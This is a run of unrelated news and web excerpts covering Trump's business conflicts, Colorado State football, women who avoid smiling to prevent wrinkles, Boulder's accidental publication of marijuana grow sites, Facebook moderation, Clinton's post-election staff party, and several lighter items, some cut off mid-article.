When pressed on Trump 's plan for his business holdings , Cohen said , “ Will we be able to appease everybody ? The answer is no. ” Cohen added . “ But everything will be done legally . He 's not interested in the company anymore . He said it yesterday in front of a whole group of people . He 's interested in fixing America . ”
Unwinding real estate holdings—which make up the majority of Trump 's assets—can be a long and complicated process . One way to place his financial interests in an actual blind trust , Painter says , would entail moving them into a holding company and then taking that company public . The proceeds from the sale of shares in this new entity would be placed in a trust that was managed for Trump 's benefit—without Trump knowing what assets the trust held . It seems unlikely , however , that Trump would part with his beloved golf courses and hotels . And this course of action would essentially require selling off a business that is managed by his three oldest children , leaving them out in the cold ( but still presumably with millions of dollars ) .
Without taking such measures , Trump will assume office as the most conflicted president in American history . And that may be fine with him . As Painter says , “ He 's never been one to worry about appearances . ”
Rams rebuilding defensive front in switch to 3-4
Colorado State linebacker Evan Colorito goes through a drill at practice . The Rams , who ranked 80th in the country in sacks in 2015 , are searching for answers when it comes to producing a pass rush . ( Mike Brohard / Loveland Reporter-Herald )
2016 CSU Storylines : Defensive front The Rams graduated four starters from the defensive line a year ago , looking for new bodies in the 3-4 set to step into the roles . Here are some key numbers to consider : Stats — CSU 's defense ranked 106th against the rush ( 213.3 yards per game ) and 80th in sacks ( 24 total ) in 2015 . Returning — Nobody on the line , though Josh Lovingood has eight career starts . The Rams are looking at a number of backups or first-time players to fill the gaps at the point of attack . Sizing it up — There is n't a returning defensive lineman who had a sack last season . While the nose guard candidate are all 300 pounds or bigger , the rest of the front is considered undersized ( 270 or less ) , meaning the Rams will have to be active up front to create problems .
FORT COLLINS — Consider it a rush project . On two fronts — to stop , to produce .
Last year , Colorado State surrendered 213.3 yards per game on the ground to the opposition ( 106th nationally ) while producing 24 sacks in 13 games ( 1.85 per ) to rank 80th .
The Rams ' first line of defense in both cases is under reconstruction and not exactly stout by college football standards . So what 's a team to do ?
`` Coach ( Ricky ) Logo has talked about it . We 're not the biggest , we 're not the strongest , we 're not the fastest , but the thing we have to rely on is technique , and you guys have got to be able to move your feet , '' junior Jakob Buys said . `` With that , it really helps . If ' you 're profound on your technique , you 'll be able to make plays and do the right things . That really helps us . ''
So does the switch to the 3-4 defense . Instead of replacing four starters , the Rams are looking for three . There is precious little experience among those vying for time , and the brunt of it lies with Josh Lovingood , a nose guard who has been slowed by injuries . He started six games last year , but had just 17 stops , down from 26 a season prior .
Him being healthy will help . So too will the additions of O'Shea Jackson and true freshman Christian Colon , both of whom started camp with injuries and are starting to work their way back . They do fit the bill — 300 pounds plus — required to plug up the middle .
But on either side , it 's not exactly beefy . Darnell Thompson and Buys range around 270 , but there is a drop off after them . They 'll have to be able to move their feet and create havoc , and while it did n't show up during scrimmages , the plans have been effective in practice .
`` I know they 're not the biggest group of guys we 'll ever see , but their athleticism definitely puts them in spots that bigger guys could n't get into , '' center Jake Bennett said . `` Jakob , Lovingood and Darnell and Richard King has come along . Bryan ( Ohene-Gyeni ) and Evan ( Colorito ) at buck , all those guys are athletic dudes who play their ass off . Toby McBride is going to come along . Have you ever shook his hand ? Once he gets a year lifting , he 's going to be scary . ''
But the Rams do n't have an extra year in the weight room . Instead , they have a game on Sept. 2 against a Colorado team that will try to test the Rams front .
By no means can the run-stopping problems be pinned entirely on the line . CSU had a penchant for giving up long scoring runs in 2015 , and the linebackers and secondary play a key role in allowing backs to find room and run free , too .
They 'll require help in providing a pass rush , too . The Rams ' leaders from last year — Joe Kawulok and Martavius Foster at 5.5 each — both graduated . Linebackers Kevin Davis and Kiel Robinson combined for seven , and the key to the new defense is to be able to bring pressure from multiple fronts . The last time the Rams used the alignment , Shaquil Barrett earned conference defensive player of the year honors with 12 sacks . Right now , Colorito has earned the first shot to be that guy , but pressure will come from all hands on deck .
Colorado State is looking for a return to form from defensive lineman Josh Lovingood , who has had injury problems plague the junior in his three seasons with the Rams . ( Mike Brohard / Loveland Reporter-Herald )
`` I think that 's kind of what our defense is made up for , to look exactly the same all the way around , but the other team not knowing where it 's coming from , '' Davis said . `` It 's really important for us to be able to disguise and show fake blitzes . That 's what we 're working on .
`` You want the offense kind of guessing where the blitz is coming from . If you do have a smaller front , that will help , just keeping the O-line guessing where it 's coming from . ''
They 'll have to , but that has n't shown up in a scrimmage yet , either .
Bobo is concerned , but he also knows the group has n't schemed up an offense yet , set a game plan to set them on a path . That could be part of the issue , but he said so is the fact they are n't hitting the edges or using their hands correctly .
He 's not necessarily looking for sacks alone , but making a quarterback move his feet , throw off his timing and make it hard to work through progressions .
`` I do n't care who you 've got back there in the secondary , if you ca n't put any pressure and make the quarterback uncomfortable , it 's going to be a long day , '' he said .
Or a long season .
Mike Brohard : 970-635-3633 , mbrohard @ reporter-herald.com or twitter.com/mbrohard
Tess Christian 's female friends look the picture of merriment when they get together for their frequent Friday nights out in a local restaurant .
Champagne flows , the conversation gets steadily more raucous and peals of laughter hang over their table .
But there 's always an odd one out in the happy scene : Tess , 50 , who sits stony-faced while her friends giggle around her . Not even a flicker of a smile , let alone a laugh , escapes her lips .
Scroll down for video
Tess Christian , 50 , ( pictured ) does not allow a flicker of a smile to pass her lips , and has n't for almost 40 years , in an attempt to ward off wrinkles
Tess is n't devoid of humour , but for nearly 40 years she has made a conscious decision not to laugh or smile — even at the birth of her daughter . This is because Tess says that maintaining a perennial poker face is a crucial way to keeping her — admittedly , impressive — youthful looks .
‘ I do n't have wrinkles because I have trained myself to control my facial muscles , ' says Tess , ‘ Everyone asks if I 've had Botox , but I have n't , and I know that it 's thanks to the fact I have n't laughed or smiled since I was a teenager . My dedication has paid off , I do n't have a single line on my face .
‘ Yes , I am vain and want to remain youthful . My strategy is more natural than Botox and more effective than any expensive beauty cream or facial . '
Tess ( right ) is pictured here with Jane Vintner ( left ) in 1982 , aged 19 . Tess says she has trained herself to control her facial muscles
As unorthodox as Tess 's regime may sound , she is not alone in her drive to suppress facial movements , such as laughing or frowning , in a bid to stop wrinkles forming .
Even celebrities such as U.S. TV star Kim Kardashian , 34 , have admitted trying not to smile or laugh ‘ because it causes wrinkles ' .
And some experts believe that this bizarre trick might work . Dermatologist Dr Nick Lowe says : ‘ It can be an effective anti-ageing technique . Undoubtedly , there are some actresses who have retrained their facial expressions to this end .
Tess , pictured here in 2001 , aged 36 , admits she is vain because she wants to remain youthful but says her strategy is 'more natural than Botox and more effective than any expensive beauty cream or facial '
‘ Wrinkles happen because of the constant creasing of smile and forehead lines by the muscles in your face , which fold the connective tissue under the skin . If you can train yourself to minimise your facial expressions , you wo n't get as many lines .
‘ We know this because it is exactly how Botox works — by reducing muscle activity . Not smiling is a DIY option , although I would have thought it difficult to keep up , not to mention boring for your partner and confusing for your children . '
So , is a life full of laughter really worth sacrificing for the sake of a few lines ? Tess , who works as a cooking instructor for a vegetable produce company , thinks so . ‘ It 's not as if I 'm miserable . I love life . I just do n't feel the need to show it by walking around with a rictus grin on my face . '
Tess , 43 , ( left ) pictured with her daughter Stevie , 16 , ( right ) . Tess says she has learned to control her facial muscles to stop herself from smiling
Her decision did n't start off as an anti-ageing device . Instead , it was a reaction to the strict Catholic school she attended .
‘ The joyless nuns there did n't like children to smile . I was always told to wipe the smile off my face so I learnt to smirk instead , ' says Tess .
By the time she reached adulthood , she realised a sombre expression suited her . ‘ If I did smile I developed big hamster cheeks that made me look deranged . I looked up to old-school Hollywood icons such as Marlene Dietrich for inspiration ; she never smiled and I loved the way she smouldered glamorously . '
Tess , ( left ) aged 23 yrs , in 1985 . Tess says although she was overjoyed when her daughter was born and when she got married , she kept a straight face the whole time
Staying tight-lipped required effort at first , however . ‘ When I found something funny or I was tempted to laugh — which happened on a daily basis — I learned to control my facial muscles by holding them rigid , ' explains Tess .
‘ The corners of my mouth might go up a little , but I never looked anything other than faintly amused . Friends knew I was fun to be around , so it was n't an issue . '
She met her ex-husband Nigel , now 54 , a photographer , at a bar in 1990 and they had a daughter , Stevie , in March 1991 . ‘ Nigel was never bothered about me not smiling , because I kept him entertained — I am engaging company . If you spent a day in my presence you would n't even notice .
The joyless nuns there did n't like children to smile . I was always told to wipe the smile off my face so I learnt to smirk instead Tess Christian
‘ After Stevie 's birth I was overwhelmed with joy , but still did n't feel the need to smile , ' adds Tess . ‘ By that stage , keeping a straight face had become second nature . '
She and Nigel married in February 1993 . ‘ Of course , the wedding photographer was urging me to smile for the pictures , but I refused , ' she says . ‘ It just was n't me . '
By the time Tess — who divorced in 1998 — reached 40 she realised that while friends had developed lines around their mouths , her skin was wrinkle free : ‘ It dawned on me that I looked younger because I 'd spent my life not smiling . '
At her London home , Tess has mastered the art of laughing inwardly at TV shows such as Absolutely Fabulous . But even after years of practice , remaining poker faced in public is n't always easy .
‘ My friends have nicknamed me Mona Lisa , after the da Vinci painting , ' she says . ‘ Mona Lisa was said to have been quietly amused , as am I. I just wo n't show it . Recently , an interior designer friend was telling me how a Spanish client kept referring to the department store John Lewis as “ Juan Lewis ” . I found it hilarious , but kept a straight face . I never crack . '
Thanks to her unwillingness to smile , Tess 's friends have nicknamed her the 'Mona Lisa ' after da Vinci 's famous painting . Tess is pictured here in 1985 , aged 23
The men she dates , meanwhile , often ask her to smile . ‘ I assure them it 's not because I 'm not interested , ' she says . ‘ My pet hate is men who call out , “ Cheer up , love , it might never happen , ” ' in the street . ‘ I would n't dream of criticising their appearance . '
Tess insists Stevie , now 24 and a film production assistant , has never been offended by her mother 's refusal to smile . ‘ She is the opposite of me — she has a pretty smile that , of course , I would never stifle , ' says Tess . ‘ She knows my sullen expression does n't mean I do n't enjoy her company . '
But London-based psychologist Amanda Hills says smiling is crucial to our mental health . ‘ When you smile you release endorphins , known as “ happy hormones ” that make you feel good , ' she explains . ‘ Not only that , but the more you do it the happier you feel , because you are telling the neural pathways in your brain you are happy — even if you are n't .
Tess , pictured in Gordon 's Wine Bar in 1985 , says her pet hate is men calling out 'Cheer up , love , it might never happen '
‘ Your brain does n't know if you are faking a smile because it 's just picking up muscle movement . Studies have shown you can increase happiness by smiling , even if you feel unhappy , which is why some medical professionals treating depression tell patients to practice smiling in the mirror .
‘ Not smiling , meanwhile , has the opposite effect . A resting face with no emotion wo n't allow your brain to pick up the signal that you are happy . And just as smiling attracts people , looking miserable is likely to deter them — which obviously risks making you feel miserable , even if you were happy in the first place . '
Tess ( pictured ) says even after years of practice , remaining poker faced in public is n't always easy .
This does n't deter Vicky Kidd , 38 , however . A textile designer from Hastings , Sussex , she started curtailing the amount she smiled five years ago after splitting up with her partner of eight years , with whom she has a son , Hayden , nine .
‘ The lines on my face were escalating and with advancing age I started worrying about being left on the shelf , ' she says . ‘ I felt most men wanted younger women and was paranoid about the competition from them . '
She was inspired by a yoga class she attended when newly single . ‘ I was taught that “ resting ” my face by relaxing my facial muscles could minimise wrinkles and make me look ten years younger , ' she says .
Vicky Kidd , 38 , noticed the lines on her face increasing five years ago and decided to limit the amount of time she spent smiling
‘ It was recommended that we practice this for ten minutes a day , but I decided to go one step further and smile as little as possible . As I have big cheeks I 've always felt I look like a horse when I smile , and it makes the skin under my eyes go baggy . '
Vicky , a vivacious woman who is adamant she is happy inside , explains : ‘ It 's not that I do n't have emotions but I think there is a common misconception about smiling — often facial expressions can be used as a mask and the happiest looking people are the most miserable .
‘ Men I 've dated have been daunted until they realise I 'm quite light-hearted underneath and strangers have called me a “ grumpy cow ” . But as I have consciously decided not to smile I ca n't take offence . '
Vicky Kidd , pictured left aged 19 , and right aged 6 , on holiday in Devon . Vicky was inspired by a yoga class she attended which taught that relaxing your facial muscles could minimise wrinkles
Yet she admits : ‘ I know I can come across as aggressive before I 've even opened my mouth . The other day I had a misunderstanding with my son 's violin teacher about which day his lesson was on . When I asked for clarification she flew off the handle because she thought I was furious , when I was n't at all . '
Unlike Tess , she is prepared to bend her rules . ‘ If someone beams at me I will smile back , so as not to appear unfriendly , ' says Vicky . ‘ And I smile at Hayden when he is being funny because I would hate to hurt his feelings . But I refuse to exacerbate my wrinkles by manufacturing an artificial smile or laughing when it 's not necessary . And most people tell me I look much younger as a result . '
But there are also experts who disagree about the anti-ageing benefits . Julia Anastasiou teaches face yoga — a form of facial massage designed to keep skin line-free by stimulating the muscles underneath . She is a firm believer that the physical act of smiling promotes a youthful appearance .
Vicky ( pictured ) admits that sometimes she does n't come across as happy when she is , and has struggled on dates in the past until men have realised she 's actually very light-hearted underneath the facade
‘ Keeping your face still to avoid wrinkles is misguided and wo n't help at all , ' she says . ‘ Wrinkles are caused by a lack of muscle tone and elasticity . Smiling massages facial muscles , which increases circulation and helps plump the skin 's connective tissue . '
Of course , smiling is not the only facial movement to alter the underlying muscles — frowning can also affect them . For this reason Christyne Remnant , 70 , has refrained from furrowing her brow since the age of eight — and credits her youthful appearance to this . ‘ I vividly remember watching my grandmother with a group of her 60-something friends , ' says Christyne , from Southampton .
‘ Their foreheads were filled with lines that I could see got worse when they frowned . I decided then and there that I did n't ever want mine to crease in the same way .
Christyne Remnant , 70 , has taken an opposite approach and says she has n't frowned since she was eight-years-old to prevent lines appearing on her forehead
‘ It very briefly occurred to me to stop smiling as well , but I decided that would be a step too far . '
She adds : ‘ Nobody thought it was strange , or even noticed , as I grew up — I was just known as a happy child . When I saw friends start to develop lines on their foreheads in their 20s , I became surer than ever that I 'd made the right decision . And the longer I went without frowning , the more alien it became to me . '
Remarkably , she says that abstaining from frowning soon became so entrenched in her psyche that she did n't find it difficult at all . She did n't frown when she took her driving test aged 32 ; during childbirth to her three children : Justine , 45 , Marcus , 44 , and Belinda , 26 ; or even when her mother died , when Christyne was 59 .
Christyne , pictured aged 22 ( left ) and 13 ( right ) , says the longer she went without frowning , the more alien it became to her
‘ Of course I 've been through the same difficult and depressing times as everyone else , but I simply cry if I 'm upset and grit my teeth if I 'm cross , ' says Christyne , who is the director of a property development company owned by her husband Douglas .
‘ I 'm probably misconstrued as being more easy going than I actually am . I 'm certainly not always happy — I get irritated by queues , smoking and people leaving doors open . But it would be very hard for me to frown when I 'm angry now . '
Christyne ( pictured ) says she may often be misconstrued as being more easy going than she actually is , but says it would be hard for her to frown when she 's angry now
Christyne 's scowl-free strategy seems to have paid off . Untouched by the surgeon 's scalpel , she could pass for a woman two decades younger .
‘ People are always surprised when they find out how old I am , ' she says . ‘ I do n't use face creams and would never have Botox . In any case , not frowning has worked better for me than anything cosmetic surgery could do . Using your facial muscles definitely marks your face . '
And for some women , that clearly is no laughing matter .
60 cultivation centers appear on city map
Dustin Shroyer , owner of Root Organic MMC , looks over his marijuana plant Thursday afternoon at his growing facility in Boulder . The city of Boulder accidentally made public the location of 60 cultivation sites , including Shroyer 's , in a map that was recently published on the city 's Web site . ( MARK LEFFINGWELL )
A map marking what are supposed to be secret locations of 60 warehouses and other buildings where medical marijuana is grown in Boulder has accidentally been made public by the city .
State law prohibits local governments from disclosing the location of so-called cultivation centers , and state lawmakers have exempted records that contain identifying information about the sites from the Colorado Open Records Act out of fear that would-be thieves might target large growing operations .
But Boulder officials say an oversight led them to publish the map on the city 's Web site , bouldercolorado.gov , on Dec. 29 as part of an agenda briefing sent to the Boulder City Council . The map shows the locations of the 60 cultivation centers , 45 dispensaries and 12 product manufacturing sites that have applied for a medical marijuana business license from the city .
The map shows clusters of cultivation centers in Gunbarrel , near Lookout Road and 63rd Street , and in north Boulder along Broadway and Lee Hill Drive . But the highest concentration of growing operations is in east Boulder , near Arapahoe Avenue and 55th Street , and along Foothills Parkway near Pearl Parkway .
Kathy Haddock , Boulder 's senior assistant city attorney who advises the council on medical marijuana issues , said Thursday that the map never should have been published .
`` The state law requires the city , and all governments , to keep the location of grow locations confidential , '' she said . `` It 's something we should have pulled out . ''
Haddock said the map would be removed from the city 's Web site .
Advertisement
Steven Zansberg , an attorney who represents the Camera and is an expert in open records law , said it 's not likely that the city would face any penalties for the slip .
The timing of the incident is fortuitous in that the council will decide at its Jan. 18 meeting whether Boulder should circumvent the open records act exemption for cultivation centers by requiring applicants for medical marijuana business licenses to waive their right to privacy .
The council could force all growing centers to sign such a waiver as a condition of receiving a city-issued business license .
But the city attorney 's office is split on that idea .
Haddock said some staffers support making the locations of growing operations public because Boulder `` typically wants things open . ''
`` My understanding of Boulder 's philosophy in general is to provide for openness wherever possible , '' she said .
But City Attorney Tom Carr is recommending against requiring growers to sign a waiver .
`` My concern is based on my experience with illegal grow operations , '' he said . `` What happens at times is people try to rob them because there 's money and pot there . ''
Carr said he understands why the state Legislature would want to prevent those types of robberies and that Boulder should `` honor that while the state works this out . ''
He said lawmakers might take a second look at the rule later this year .
Dustin Shroyer , owner of the Root Organic MMC dispensary , at 5420 Arapahoe Ave. , said keeping the location of his growing warehouse in Boulder a secret is important to his business -- which offers a combination of marijuana products and a spa with yoga , acupuncture and `` lifestyle coaching . ''
`` It 's important to us just for security purposes , '' he said .
But Shroyer said he is n't overly concerned about the accidental disclosure because he considers his warehouse `` so secure that anybody who would try to break in would have the police surround them instantly . ''
He said he has security cameras and extra layers of security doors , and he does n't keep telltale signs of what 's inside -- including bags of dirt or compost -- sitting outside the warehouse .
Still , he said , people who are motivated enough could probably figure out on their own pretty quickly where people are growing marijuana .
`` I think anybody with any knowledge could scout any industrial warehouse and find some , '' he said .
Shroyer said he 's not upset with the city over the accidental disclosure because city officials and medical marijuana business owners are still learning how to deal with one another .
`` It 's very important to let them work the bugs out of their system , '' he said . `` Hopefully , they 'll just grow from that and learn from it . ''
Contact Camera staff writer Heath Urie at 303-473-1328 , or urieh @ dailycamera.com .
After Facebook 's removal of an iconic Vietnam war photo stirred an international uproar last month , the social network 's executives quickly backtracked and cleared its publication .
But the image – showing a naked Vietnamese girl burned by napalm – had previously been used in training sessions as an example of a post that should be removed , two former Facebook employees told Reuters .
Trainers told content-monitoring staffers that the photo violated Facebook policy , despite its historical significance , because it depicted a naked child , in distress , photographed without her consent , the employees told Reuters .
The social network has taken great pains to craft rules that can be applied uniformly with minimal discretion . The reversal on the war photo , however , shows how Facebook 's top executives sometimes overrule company policy and its legions of low and mid-level content monitors .
Facebook has often insisted that it is a technology company – not a media company – but an elite group of at least five senior executives regularly direct content policy and make editorial judgment calls , particularly in high-profile controversies , eight current and former Facebook executives told Reuters .
Facebook has long resisted calls to publicly detail its policies and practices on censoring postings . That approach has drawn criticism from users who have had content removed and free-speech advocates , who cite a lack of transparency and a lack of an appeals process for many content decisions .
Palestinian activism censored
More recently , Palestinian activists and media professionals have found their comments not just censored , but entire accounts disabled for no apparent reason .
Last month , Facebook disabled the accounts of editors at two of the most widely read Palestinian online publications , Shehab News Agency and Quds . In keeping with standard company practice , Facebook did not publicly offer a reason for the action or pinpoint any content it considered inappropriate .
Some Palestinian advocacy groups and media outlets condemned the shutdowns as censorship stemming from what they described as Facebook 's improper alliance with the Israeli government .
Israel has pushed Facebook to block hundreds of pages it believes incite violence against Jews , said Noam Sela , spokesman for Israeli cabinet minister Gilad Erdan . Sela said Israeli “ had a connection ” at Facebook to handle complaints but declined to elaborate on the relationship .
“ It 's not working as well as we would like , ” Sela said . “ We have more work to do to get Facebook to remove these pages . ”
Ezz Al-Din Al-Akhras , a supervisor at Quds , said that Facebook 's head of policy in the Middle East had gotten in touch after the uproar over the shutdowns and that three of four suspended accounts were restored .
“ We hope the Facebook campaign of suspending and removing Palestinian accounts will stop , ” he said . “ We do not practice incitement ; we are only conveying news from Palestine to the world . ”
Facebook said the restoration of the accounts was not a response to complaints . It declined to comment on whether top executives were involved .
Days after losing the presidential election , Hillary Clinton emerged on Friday night at a party for her campaign staff in New York after acknowledging earlier that the last few days have been 'very , very tough ' .
Clinton was cheered by her staff members as she walked on stage during the event at The Marriott hotel , close to her campaign headquarters in Brooklyn .
Her husband , Bill , daughter Chelsea , campaign chairman John Podesta and top aide Huma Abedin were standing close by as they also clapped for her .
As her staff started chanting her name , she stood there and admired the crowd of people cheering her on , while also saying 'thank you so much ' .
She also said she had 1,200 roses delivered to her home on Friday and that she brought them to the event for everyone to have .
While speaking to the crowd , she begged them to keep fighting for what 's right .
Scroll down for video
Goodbye ? : Days after losing the presidential election , Hillary Clinton ( above ) emerged on Friday night at a party for her campaign staff in New York after acknowledging earlier that the last few days have been 'very , very tough '
Clinton ( above ) was cheered by her staff members as she walked on stage during the event . Her husband , Bill , daughter Chelsea , and top aide Huma Abedin were standing close by as they also clapped for her
' I love you and will be forever grateful to you and I hope that our paths will cross in someways over the months and years to come , ' Clinton told her staffers .
'But tonight it 's really my chance to say thank you , thank you for everything you have done for me , for our common mission , our campaign that I 'm so proud of .
'And have a good time tonight and then regroup and think about what we can do to make sure that we prove love trumps hate . '
Both her husband and Podesta were reportedly crying as she spoke on stage .
Earlier in the day during a 15-minute call with staff members and volunteers across the country , she explained that the election loss has taken an emotional toll on her .
' I 'm not going to sugarcoat it : These have been very , very tough days , ' Clinton said .
As her staff started chanting her name , she stood there and admired the crowd of people cheering her on , while also saying 'thank you so much ' at the beginning of the party
After speaking to her staff on stage , she mixed in with the crowd at the party on Friday . She also hugged some of the people who have worked tirelessly for her over the past few years during her pursuit of the White House
'This is a tough time for our country . I think we have seen how people have been reacting to the events of this election and I know we have got to be reaching out to each other to keep it clear in our own minds that what we did is so important .
'It looks like we are on the path to winning the popular vote , and that says volumes about the importance of your work and the lasting impact it will have . '
She thanked her supporters for all of the hard work they put into her campaign as it was 'one of the greatest honors ' of her life .
The former first lady also encouraged them to remain politically active .
'This is a hard loss for all of us because we know what was at stake in this election and we have to do everything we can to continue to support the causes we believe in , ' the former secretary of state said .
'When you 're ready , I hope you will get up and back in there and keep fighting . '
After learning about her shocking loss to President-elect Donald Trump , Clinton reportedly 'could n't stop crying . '
Earlier in the day on Friday , some of her staff members were able to pose in a pictured with her top aide , Huma Abedin ( pictured above center )
The group also posed for a picture with Clinton 's campaign chairman , John Podesta ( pictured above center )
Best-selling conservative author Ed Klein told Newsmax TV that once the former first lady learned she had really lost to Trump , she called one of her friends crying .
'About 6:30 this morning she called an old friend , ' he said while appearing on 'The Steve Malzberg Show ' on Wednesday .
'She was crying , inconsolably . She could n't stop crying .
'Her friend said — her female friend from way , way , back — said that it was even hard to understand what she was saying , she was crying so hard .
'This is Hillary we 're talking about . '
Klein did not reveal who her longtime female friend was during the interview , but he also revealed Clinton apparently blamed FBI Director James Comey for her stunning loss .
'Eventually her friend said she could make out that she was blaming James Comey , the director of the FBI , for her loss — and this I do n't understand exactly — and the president of the United States for not doing enough , ' Klein stated .
Painful : After learning about her shocking loss to President-elect Donald Trump , Hillary Clinton ( pictured left ) reportedly 'could n't stop crying ' conservative author Ed Klein ( right ) claims
Marked contrast : On Thursday , Clinton appeared to have the weight of the campaign lifted from her shoulders as she posed with a hiker near her Chappaqua home ( above )
'She said : 'Well , she felt , Hillary felt , that the president could have stopped Comey a long time ago , because that 's what ( former President ) Bill ( Clinton ) said . '
Eleven days before the election , Comey reopened the FBI investigation into her private email server , but concluded that she would not face any charges on Sunday .
It soon was revealed that the FBI had come across thousands of additional emails related to Clinton while investigating the laptop of disgraced ex-Rep. Anthony Weiner , who is married to Abedin , though the two are now estranged .
As DailyMail.com reported , Weiner , who quit Congress after a sexting scandal , allegedly sent inappropriate messages to an underage girl .
After the FBI bombshell , Abedin was suddenly off Clinton 's campaign plane for several days , missing high-profile campaign events in swing states with Jennifer Lopez , March Anthony , Beyonce , and Jay-Z .
But she re-emerged to hold a Washington D.C. fundraiser with Vogue editor Anna Wintour on the Friday before the election where she was photographed smiling .
Then , just two days before the election , Comey announced that the FBI had found nothing to change its earlier conclusion not to prosecute Clinton – essentially leaving her off the hook , as far as the investigation is concerned .
It was Comey 'who we think may have cost us the election , ' campaign chair John Podesta said on a post-election campaign conference call , The Hill reported .
Abedin was back on the plane for Clinton 's final flights , which had the feel of a victory lap as singer Jon Bon Jovi hitched a ride between campaign events and Abedin laughed at the front of the plane .
Breaking down : Huma Abedin was crying as she walked to the Clinton campaign headquarters , carrying the access credential for the Brooklyn offices
The dream is over : Abedin , who has only ever worked for Hillary Clinton , was back at the campaign headquarters for the first time . She was its vice-chair and seen as the most important of her personal retinue
The 40-year-old was pictured weeping openly in the street on Friday as she returned to the place where the Democratic candidate 's campaign was fought - and lost .
Abedin looked like she had the weight of the world on her shoulders as she visited the campaign headquarters of the failed presidential candidate – after her own stumbles and her husband 's sexting habits helped contribute to Clinton 's historic defeat .
Abedin ventured out of her Manhattan apartment and went to the office three days after President-elect Donald Trump shocked the world by defeating Clinton .
She approached the tall building with stunning views which had until Tuesday been filled with staff an volunteer carrying a bag and a purse .
The pain and emotion of the situation were clearly visible on the face of the long-time loyalist , despite the dark large-frame sunglasses that covered her eyes .
You must ask yourself what Social Network do I choose ? This is the most important question . If you 're a blogger and own a self hosted blog , social networks can be great traffic drivers to your site .
Social Network Humor :
I Ask , and I find myself doing a Backflip over my decision . I grow hungry and begin to Feed Me Links and Squidoo on the side . It was so Del.icio.us I had to Mixx up another batch . I have so many Fave foods to choose from , but I am so undecided on what to choose . I than ask my girlfriend to share Co.mments on what to eat . I than Digg through the refrigerator to decide what I want . I than StumbleUpon some leftover pasta my girlfriend made . I start to eat it and enjoy it so much I gave my girlfriend a big Hugg . I am still not satisfied yet , so I begin to look through the Yellow Pages and order Mister Wong Chinese . The door bell rings 30 minutes later and it 's the delivery guy , Yahoo ! .
Social Network Tips :
It took a while to decide what social network I wanted to participant in . It 's important not to over extend yourself by participating in too many social networks . Keep it simple by selecting no more than 3 , so you can put more time and focus , thus getting better results .
I am going to admit something here . Though I have educators all through my family and I have the greatest respect for teaching as a profession ( in the sense that Socrates was a teacher ) I have little respect for our public schooling system . Though I went through one of the “ best ” public school systems in the United States nearly my entire experience , with a few shining exceptions , was of mediocrity of thought and effort from both the teachers and the students . School rewarded those who filled in the circles and checked the boxes . It was a machine .
But I can say at least that I never had any completely inappropriate political rants from any teachers . There was some political correctness to be sure but I never remember any slavish homages to big government . But I guess I was one of the lucky ones . In California at a recent gathering the president of the California Federation of Teachers Joshua Pechthalt said :
[ The CFT is ] a beacon of progressive , social justice unionism . . . . That 's why we have consistently supported single payer health care reform and progressive tax reform measures . . . . The CFT is committed to the vision articulated by the civil rights movement and efforts to ensure class , race and gender equity and the just demands for comprehensive immigration reform . We understand that central to the mission of public education is the need to advocate for a different kind of society . ”
The MISSION of public education is advocating for a “ different kind of society ? ” Silly me . I thought the mission was the EDUCATION of our young people . I mean I 've long known the real mission , but you guys always insisted it was about EDUCATION , not indoctrination . And by different kind of society does Mr. Pechthalt mean a free society ? One in which freedom of thought , speech , and commerce are respected ? One where the heavy hand of the state is drastically reduced and people are allowed to define their own way in life ? Sadly no . What it sounds like is Mr. Pechthalt would like an even more statist , more heavy handed , frankly totolitarian “ society. ” The Cuban model might be nice . Actually the “ Californian ” model is better than the Cuban . Teachers are much better paid in California while they do their indoctrinating .
The Washington Post ( Dec. 15 ) cited the average yearly salary of teachers in California at $ 69,324—the third highest in America . The salary does not reflect other benefits such as healthcare and pensions . Estimates of those benefits vary widely , and predictably so ; the unfunded mandate of teachers ' pensions may well be the most heated political conflict in California and statistics are weapons . The Los Angeles Times gave the low end : “ The average retiree last year left his or her job at age 62 with a monthly pension of $ 3,980 after working 25 years. ” The Voice of San Diego gave the high end : “ Every district employee gets a guaranteed pension , which . . . will pay them 80–90 percent of their highest salary every year until they die . . . That teacher making $ 73,000 today will get 80–90 percent of their final salary number which will be as high as $ 95,000 . They are eligible for retirement beginning at the age of 55 . ”
Get the kids to believe the state is the answer to everything and ensure your own lavish retirement in the process . Ah , the life of a lower level education crony . And you get summers off too .
Click here for the article .
When wood structures and recycled shipping containers are perfectly combined , a thin line is magically drawn between two opposite worlds : organic and industrial . The Savannah project illustrates the merging of these different realities into a single living space . The result : a contemporary green home created with two 3.7sqm recycled containers .
Located in the city of Savannah , this single story building takes advantage of the adaptive use of this universal device to generate a simple and flexible residence for a couple with a minimum waste of budget and energy .
An elevated terrace made of local wood invites us to enter through a glass sliding door positioned between two parallel blue steel containers . The disposition of the program follows a clear and decisive conceptual option : avoid partitions in the interior by cutting a significant part of the edges of both recycled shipping containers .
This decomposing process allowed the conquest of a comfortable open space . Living , dining and kitchen areas are arranged as a spatial sequence that benefits from strategic openings to an outdoor terrace . Only the bathroom is totally isolated from the rest of the program while a double bedroom is deliberately placed in a projected area of one container creating a second terrace area .
The blue facade of Savannah Project was left untouched , respecting its original state…maybe a poetic reference to its amazing capacity to absorb a new function so distant from its primary use . As exteriors were left untouched , interiors are bright and modern composed by three colors : white for ceilings and walls ; black for flooring and wood for framework… an invisible boundary between organic and industrial lives inside this unique architecture .
Architects : Julio Garcia – PSP
Photography : Tessa Blumenberg
Jade starting craving loo roll while she was pregnant but now ca n't stop eating the stuff
It 's a well known fact that expectant mothers can experience some weird cravings , but this young mum took it one step further by eating LOO ROLL .
Jade Sylvester , 25 , developed a craving for clean toilet paper during her recent pregnancy and now eats as much as entire roll every day .
The mum-of-five first developed the bizarre snacking habit while she was expecting her youngest son Jaxon , but 15 months after giving birth she still ca n't quit the paper .
`` Two months into the pregnancy , I started craving toilet roll . I still do n't know why , '' said Jade , from Gainsborough , Lincolnshire .
`` I like the feeling of the texture in my mouth , rather than the taste . I like the dryness . ''
`` My family tell me it is n't very good for me - but I ca n't help it , '' she added .
As we all know , life is short . It is therefore one of the rarest and most valuable commodities we have . In case you ever forget this tenet , recall Drake 's horrendous acronym : YOLO . In an age where everyone is looking for contented happiness , many can not achieve this psychological state and fall into what they feel is depression .
We live in a viscous world of instant gratification . The intoxicating effects of artificial happiness often leave us feeling down when that short-lived exhilaration subsides . The reality is that the exhilaration was insubstantial to begin with , so when it wears off you are left with something far worse than depression : feeling down after a happiness that was not real in the first place .
We often encounter these `` depressed '' individuals who feel that when they try , the result is rarely efficacious . Their solution ? They give up on trying altogether . Well , that ends today .
Being happy is a state of mind , not an action , and this article will provide the panacea for your painful troubles .
